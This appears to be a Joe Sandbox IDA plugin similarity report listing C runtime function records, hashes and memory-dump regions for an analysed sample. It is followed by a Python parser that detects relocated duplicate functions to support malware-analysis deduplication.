                                            • String ID: 06E$P0E
                                            • API String ID: 1108511539-3978550416
                                            • Opcode ID: 06cb82f9406a8be62de34f6836860520eff65df27a116840868cf6d0d4190e7e
                                            • Instruction ID: 4660481e8b01e839d5568f54d4753b0e48e28ce44faaa9a024d6f640f261ebc1
                                            • Opcode Fuzzy Hash: 06cb82f9406a8be62de34f6836860520eff65df27a116840868cf6d0d4190e7e
                                            • Instruction Fuzzy Hash: C52180B5600A41C7D7149F25D85136A37A1B785B49F818037DB4967BF5CB7DC8C0CB18
                                            APIs
                                            • _errno.LIBCMT ref: 0077ECB1
                                              • Part of subcall function 00781118: _getptd_noexit.LIBCMT ref: 0078111C
                                            • _invalid_parameter_noinfo.LIBCMT ref: 0077ECBC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                             • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                            • String ID: B
                                            • API String ID: 1812809483-1255198513
                                            • Opcode ID: 60c63a2ab9f2c694e46ab874add7d0a6eb48e0963f6941f66a4f1d1620c6c169
                                            • Instruction ID: 54b03a5859b282b8a337173d91da853d2c20a05d016ec228964154f02cc349b3
                                            • Opcode Fuzzy Hash: 60c63a2ab9f2c694e46ab874add7d0a6eb48e0963f6941f66a4f1d1620c6c169
                                            • Instruction Fuzzy Hash: 280180B2624B54C6EB109F12E444399B665F798FE4F988325AF5C17BA5CF3CD245CB00
                                            APIs
                                            • _errno.LIBCMT ref: 007CF8B1
                                              • Part of subcall function 007D1D18: _getptd_noexit.LIBCMT ref: 007D1D1C
                                            • _invalid_parameter_noinfo.LIBCMT ref: 007CF8BC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                            • String ID: B
                                            • API String ID: 1812809483-1255198513
                                            • Opcode ID: c02d2d703cad3fde31994e70e132d1470a84cf0b2fdde3fa0011d2dc5e3ae6ea
                                            • Instruction ID: 4303b45e746caded6edeb4eec735b6c34950cf6d25104996cccb1d036f018ff5
                                            • Opcode Fuzzy Hash: c02d2d703cad3fde31994e70e132d1470a84cf0b2fdde3fa0011d2dc5e3ae6ea
                                            • Instruction Fuzzy Hash: 42015B72624B4086DB109F12E444759B7A1FBA8FE4FA84329AB5817BA9CF3CC146CB00
                                            APIs
                                            Strings
                                            • Unknown error, xrefs: 00401D2C
                                            • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: fprintf
                                            • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                            • API String ID: 383729395-3474627141
                                            • Opcode ID: 060ed8b4f48fff566cb5ba301f549a09f8373ce553815899d5138d05545a2a64
                                            • Instruction ID: 59ce1e855a84c40590a6f1d7e5fdbb5789b26ea1a6d81feca49222ead83698e2
                                            • Opcode Fuzzy Hash: 060ed8b4f48fff566cb5ba301f549a09f8373ce553815899d5138d05545a2a64
                                            • Instruction Fuzzy Hash: 19016163918F88C3D6018F18E8003AA7331FB6E749F259316EF8C26565DB39D592C704
                                            APIs
                                            Strings
                                            • Argument domain error (DOMAIN), xrefs: 00401CE0
                                            • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: fprintf
                                            • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                            • API String ID: 383729395-2713391170
                                            • Opcode ID: ffb7db3649f765f6754a53c0185fc82a21da43e3d5c879aecf4419589f6ac527
                                            • Instruction ID: 19d1ab342afe3ad9ea86bf5e66ade9d92ee5eaa311f738746577795edc5800f2
                                            • Opcode Fuzzy Hash: ffb7db3649f765f6754a53c0185fc82a21da43e3d5c879aecf4419589f6ac527
                                            • Instruction Fuzzy Hash: 5EF06256858E8882D2029F1CE8003AB7331FB5EB89F245316EF8D36155DB29D5828704
                                            APIs
                                            Strings
                                            • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                            • Partial loss of significance (PLOSS), xrefs: 00401CF0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: fprintf
                                            • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                            • API String ID: 383729395-4283191376
                                            • Opcode ID: 18191e57db33b4e70e59b5a3d3e3df1f7191def02d3bc11653a7ff43ad774231
                                            • Instruction ID: 72b50771eb885944449533605f92bc4095f36d05608744bf9fda369d3d258743
                                            • Opcode Fuzzy Hash: 18191e57db33b4e70e59b5a3d3e3df1f7191def02d3bc11653a7ff43ad774231
                                            • Instruction Fuzzy Hash: 49F06256858E8882D2029F1CE8003AB7331FB5EB89F245316EF8D36155DB29D5828704
                                            APIs
                                            Strings
                                            • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                            • Overflow range error (OVERFLOW), xrefs: 00401D00
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: fprintf
                                            • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                            • API String ID: 383729395-4064033741
                                            • Opcode ID: f9e84ebcb7ff6edc01efffe7a2503a57f9d003c7be521cdfefda22305502a0e8
                                            • Instruction ID: 80ece2abca5378ef05b9d519cef63ff07e16b40d1adb7ebcdaa7eeb16c026ebe
                                            • Opcode Fuzzy Hash: f9e84ebcb7ff6edc01efffe7a2503a57f9d003c7be521cdfefda22305502a0e8
                                            • Instruction Fuzzy Hash: 4FF06257858E8882D2029F1CE8003AB7331FB5EB89F245316EF8D36155DB29D5828704
                                            APIs
                                            Strings
                                            • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                            • The result is too small to be represented (UNDERFLOW), xrefs: 00401D10
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: fprintf
                                            • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                            • API String ID: 383729395-2187435201
                                            • Opcode ID: 6dd4cf5b349fc847c3dcee8b8810e4477711ad86737d6eb6accb21fb67c8ba71
                                            • Instruction ID: 6c5864fbeb6c7f4b963c4697b524ad25517706f5afd63d8b54a146ff3f516c0f
                                            • Opcode Fuzzy Hash: 6dd4cf5b349fc847c3dcee8b8810e4477711ad86737d6eb6accb21fb67c8ba71
                                            • Instruction Fuzzy Hash: 48F06256858E8882D2029F1DE8003AB7331FB5E789F245316EF8D36155DB29D5828704
                                            APIs
                                            Strings
                                            • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                            • Total loss of significance (TLOSS), xrefs: 00401D20
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: fprintf
                                            • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                            • API String ID: 383729395-4273532761
                                            • Opcode ID: 8660fa55e8950004dec4a570e9212e7fe6fefa6bca1faacdb15b35959efb44f5
                                            • Instruction ID: fb67b1574da8526718952bc4acd2e4b2938ff38d259f1ca349d8fde6e4d57ddc
                                            • Opcode Fuzzy Hash: 8660fa55e8950004dec4a570e9212e7fe6fefa6bca1faacdb15b35959efb44f5
                                            • Instruction Fuzzy Hash: 2BF06256858E8882D2029F1CE8003AB7331FB5E789F245316EF8D36555DF29D5828704
                                            APIs
                                            Strings
                                            • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                            • Argument singularity (SIGN), xrefs: 00401C78
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2975793604.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.2975749424.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975833411.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975871835.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975941933.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2975979762.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.2976023864.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_A1E0xfcSNl.jbxd
                                            Similarity
                                            • API ID: fprintf
                                            • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                            • API String ID: 383729395-2468659920
                                            • Opcode ID: 2ba2f6e238f8e9c229c48e66cccf0b2e63387fe02db74aec0f0aa87893f784d2
                                            • Instruction ID: c7517851250d5d007e0f967f84f5791a1ac141f8cb5801964327b6ba23b519ec
                                            • Opcode Fuzzy Hash: 2ba2f6e238f8e9c229c48e66cccf0b2e63387fe02db74aec0f0aa87893f784d2
                                            • Instruction Fuzzy Hash: 8CF09056814F8882C202DF2CE8003AB7330FB4EB8DF249316EF8C3A155DF29D5828704
                                            APIs
                                            • calloc.LIBCMT ref: 0076116A
                                              • Part of subcall function 0078E208: _calloc_impl.LIBCMT ref: 0078E218
                                              • Part of subcall function 0078E208: _errno.LIBCMT ref: 0078E22B
                                              • Part of subcall function 0078E208: _errno.LIBCMT ref: 0078E235
                                            • free.LIBCMT ref: 007612F3
                                            • free.LIBCMT ref: 007612FD
                                            • free.LIBCMT ref: 0076130F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                             • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: free$_errno$_calloc_implcalloc
                                            • String ID:
                                            • API String ID: 4000150058-0
                                            • Opcode ID: 1990de878bdb2b18b214190b8058df6cf8cdb58ae8a7ad838a221dc59059176c
                                            • Instruction ID: bdf53f4c0c7f838c4a244a14e53fd41a242a1ac30e94eb2be504be724bfbbd18
                                            • Opcode Fuzzy Hash: 1990de878bdb2b18b214190b8058df6cf8cdb58ae8a7ad838a221dc59059176c
                                            • Instruction Fuzzy Hash: E9C1F836608B848AD764CF65E88479E77B4F788B88F54412AEF8E97B18DF38C555CB00
                                            APIs
                                            • calloc.LIBCMT ref: 007B1D6A
                                              • Part of subcall function 007DEE08: _calloc_impl.LIBCMT ref: 007DEE18
                                              • Part of subcall function 007DEE08: _errno.LIBCMT ref: 007DEE2B
                                              • Part of subcall function 007DEE08: _errno.LIBCMT ref: 007DEE35
                                            • free.LIBCMT ref: 007B1EF3
                                            • free.LIBCMT ref: 007B1EFD
                                            • free.LIBCMT ref: 007B1F0F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: free$_errno$_calloc_implcalloc
                                            • String ID:
                                            • API String ID: 4000150058-0
                                            • Opcode ID: 098b9973f943fd418b7180529354ef0ede5274538db457ffc537a6b083c63ad8
                                            • Instruction ID: a2906950edc348098c9d064a20900dfcb771f2c9e4e965c551c33715546ef859
                                            • Opcode Fuzzy Hash: 098b9973f943fd418b7180529354ef0ede5274538db457ffc537a6b083c63ad8
                                            • Instruction Fuzzy Hash: 24C1FA36608B84CAD764CF65E89479E77B4F788B88F50812AEB8D87B18DF78C555CB00
                                            APIs
                                            • malloc.LIBCMT ref: 0077A178
                                              • Part of subcall function 0077E684: _FF_MSGBANNER.LIBCMT ref: 0077E6B4
                                              • Part of subcall function 0077E684: _NMSG_WRITE.LIBCMT ref: 0077E6BE
                                              • Part of subcall function 0077E684: _callnewh.LIBCMT ref: 0077E6F2
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E6FD
                                              • Part of subcall function 0077E684: _errno.LIBCMT ref: 0077E708
                                            • free.LIBCMT ref: 0077A2BF
                                            • free.LIBCMT ref: 0077A323
                                            • free.LIBCMT ref: 0077A32F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                             • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: free$_errno$_callnewhmalloc
                                            • String ID:
                                            • API String ID: 2761444284-0
                                            • Opcode ID: 4bbd7cf35d3a9611d3bfe0cac302482741ce3a5729489c26a54f39a05b56b302
                                            • Instruction ID: 3e9d4147efe63a833427f69a31ed47e844af07dc80f9cb46b6cfe3f3dc51b34c
                                            • Opcode Fuzzy Hash: 4bbd7cf35d3a9611d3bfe0cac302482741ce3a5729489c26a54f39a05b56b302
                                            • Instruction Fuzzy Hash: 7651ED31304745E6EE28AF22A45436D63A2BBC2BC0F588929EE0E5BB55EF7DD511C702
                                            APIs
                                            • malloc.LIBCMT ref: 007CAD78
                                              • Part of subcall function 007CF284: _FF_MSGBANNER.LIBCMT ref: 007CF2B4
                                              • Part of subcall function 007CF284: _NMSG_WRITE.LIBCMT ref: 007CF2BE
                                              • Part of subcall function 007CF284: HeapAlloc.KERNEL32 ref: 007CF2D9
                                              • Part of subcall function 007CF284: _callnewh.LIBCMT ref: 007CF2F2
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF2FD
                                              • Part of subcall function 007CF284: _errno.LIBCMT ref: 007CF308
                                            • free.LIBCMT ref: 007CAEBF
                                            • free.LIBCMT ref: 007CAF23
                                            • free.LIBCMT ref: 007CAF2F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: free$_errno$AllocHeap_callnewhmalloc
                                            • String ID:
                                            • API String ID: 3531731211-0
                                            • Opcode ID: 12a82f6075b3f1b1b37aa8f48911ccb92805a6f06572296fb4e409a8028c0c4a
                                            • Instruction ID: 13e95552511cbde4ada956896dd32555cc21ea104ce943739551274ff1acb991
                                            • Opcode Fuzzy Hash: 12a82f6075b3f1b1b37aa8f48911ccb92805a6f06572296fb4e409a8028c0c4a
                                            • Instruction Fuzzy Hash: 7051E1B530068AA2DA18AB22D458B7D7361FB80BD9F54043EEE0E57B59EF7CD501C701
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
                                             • Associated: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: malloc
                                            • String ID:
                                            • API String ID: 2803490479-0
                                            • Opcode ID: 80bcae34b50f6f3c58066c2fc9d1801100724e039a84313f03cb0366590bdd42
                                            • Instruction ID: 7756d24aa779409e2f8f08eb25284cc922021df2979e078b313a8529c79c62ac
                                            • Opcode Fuzzy Hash: 80bcae34b50f6f3c58066c2fc9d1801100724e039a84313f03cb0366590bdd42
                                            • Instruction Fuzzy Hash: 4041AB72B0478287CB58DF26E4546AE77A1F794BC8B548525EE2B87B05EF3CDA05C700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_760000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: malloc
                                            • String ID:
                                            • API String ID: 2803490479-0
                                            • Opcode ID: 1a29f9ba763a41af98fc3daf4a760b7fafa00e022ffdaa07ef0aba0b6fdaf4ad
                                            • Instruction ID: f246a7e8a661c8de9dd0d011c955a88175622dec7d54a380c1e96e7d7ada8de7
                                            • Opcode Fuzzy Hash: 1a29f9ba763a41af98fc3daf4a760b7fafa00e022ffdaa07ef0aba0b6fdaf4ad
                                            • Instruction Fuzzy Hash: CA41AD723047C097CB19DB26E414BAE77A1F784B88F448529EE6A87B06EF3CD856C700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7b0000_A1E0xfcSNl.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLast$CurrentProcessfreemalloc
                                            • String ID:
                                            • API String ID: 1397824077-0
                                            • Opcode ID: cf62d47a1d5fdb9c876962cfa4c676d021a3fa8d1c8180fd698ba2a0010a64ef
                                            • Instruction ID: cbd133aee134034aed69fcbc6f774849524b6b47bc3c4f9de3c6c2c0d02a29e5
                                            • Opcode Fuzzy Hash: cf62d47a1d5fdb9c876962cfa4c676d021a3fa8d1c8180fd698ba2a0010a64ef
                                            • Instruction Fuzzy Hash: 4D417572714681C6D724DB22E445BAF6351FB897C8F40542DEF8947B4AEF3DC5818710
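The function records above are only useful if they can be pivoted on, and the report already shows a pattern worth surfacing: the calloc/free function with API String ID 4000150058-0 appears once in the 0x760000 dump region and once in the 0x7B0000 region, with every call site exactly 0x50C00 apart and a near-identical Instruction Fuzzy Hash, i.e. one copy of the same code mapped at two bases. The following parser is an added example and not part of the Joe Sandbox report or the IDA plugin; the sample input is constructed from two of the records above (other fields omitted), and the hex-digit mismatch count used to compare fuzzy hashes is an assumption standing in for Joe Sandbox's proprietary comparison.

```python
import re
from collections import defaultdict

# Constructed sample: two records in the layout of the "Similarity" listing,
# with values copied from the report's calloc/free records (not the report itself).
SAMPLE = """\
APIs
• calloc.LIBCMT ref: 0076116A
  • Part of subcall function 0078E208: _calloc_impl.LIBCMT ref: 0078E218
• free.LIBCMT ref: 007612F3
• free.LIBCMT ref: 007612FD
Memory Dump Source
• Source File: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: true
Yara matches
Similarity
• API ID: free$_errno$_calloc_implcalloc
• String ID:
• API String ID: 4000150058-0
• Opcode ID: 1990de878bdb2b18b214190b8058df6cf8cdb58ae8a7ad838a221dc59059176c
• Instruction Fuzzy Hash: E9C1F836608B848AD764CF65E88479E77B4F788B88F54412AEF8E97B18DF38C555CB00
APIs
• calloc.LIBCMT ref: 007B1D6A
  • Part of subcall function 007DEE08: _calloc_impl.LIBCMT ref: 007DEE18
• free.LIBCMT ref: 007B1EF3
• free.LIBCMT ref: 007B1EFD
Memory Dump Source
• Source File: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
Similarity
• API ID: free$_errno$_calloc_implcalloc
• String ID:
• API String ID: 4000150058-0
• Opcode ID: 098b9973f943fd418b7180529354ef0ede5274538db457ffc537a6b083c63ad8
• Instruction Fuzzy Hash: 24C1FA36608B84CAD764CF65E89479E77B4F788B88F50812AEB8D87B18DF78C555CB00
"""

API_REF = re.compile(r"^• (?P<api>[^ ]+)\.(?P<module>[A-Z0-9_]+) ref: (?P<addr>[0-9A-Fa-f]+)$")
FIELD = re.compile(r"^• (?P<key>[^:]+): ?(?P<value>.*)$")
OFFSET = re.compile(r"Offset: (?P<off>[0-9A-Fa-f]+)")


def parse_records(text):
    """One dict per function record; a record starts at an 'APIs' line.

    Top-level API bullets become (api, module, address) tuples. 'Part of
    subcall' bullets describe callees, not this function, so they are skipped.
    '• Key: value' bullets are stored by key; 'base' is the dump Offset.
    """
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"apis": [], "fields": {}}
            records.append(cur)
            continue
        if cur is None or not line.startswith("•") or line.startswith("• Part of subcall"):
            continue
        m = API_REF.match(line)
        if m:
            cur["apis"].append((m["api"], m["module"], int(m["addr"], 16)))
            continue
        m = FIELD.match(line)
        if m:
            cur["fields"][m["key"]] = m["value"]
            o = OFFSET.search(m["value"]) if m["key"] == "Source File" else None
            if o:
                cur["base"] = int(o["off"], 16)
    return records


def hex_distance(a, b):
    """Number of differing hex digits (assumed rough stand-in for the real fuzzy compare)."""
    if len(a) != len(b):
        raise ValueError("fuzzy hashes differ in length")
    return sum(x != y for x, y in zip(a.upper(), b.upper()))


def relocated_pairs(records):
    """Records sharing an API String ID but living in different dump regions.

    'delta' is the constant offset between matching call sites when all of them
    agree (None otherwise); together with a small hash distance it indicates the
    same code mapped at two bases rather than two functions with the same imports.
    """
    by_id = defaultdict(list)
    for r in records:
        key = r["fields"].get("API String ID")
        if key and "base" in r:
            by_id[key].append(r)
    pairs = []
    for key, group in by_id.items():
        for i, a in enumerate(group):
            for b in group[i + 1:]:
                if a["base"] == b["base"]:
                    continue
                deltas = {bb[2] - aa[2] for aa, bb in zip(a["apis"], b["apis"]) if aa[0] == bb[0]}
                delta = deltas.pop() if len(deltas) == 1 else None
                dist = hex_distance(a["fields"]["Instruction Fuzzy Hash"],
                                    b["fields"]["Instruction Fuzzy Hash"])
                pairs.append({"api_string_id": key, "bases": (a["base"], b["base"]),
                              "delta": delta, "hash_distance": dist})
    return pairs


if __name__ == "__main__":
    for p in relocated_pairs(parse_records(SAMPLE)):
        print(p)
```

A shared API String ID on its own only says two functions reference the same API and string set; the Opcode IDs above differ, so it is the agreeing call-site delta plus the short fuzzy-hash distance that justifies treating the 0x7B0000 records as a second mapping of the 0x760000 code when deduplicating before a YARA or similarity hunt.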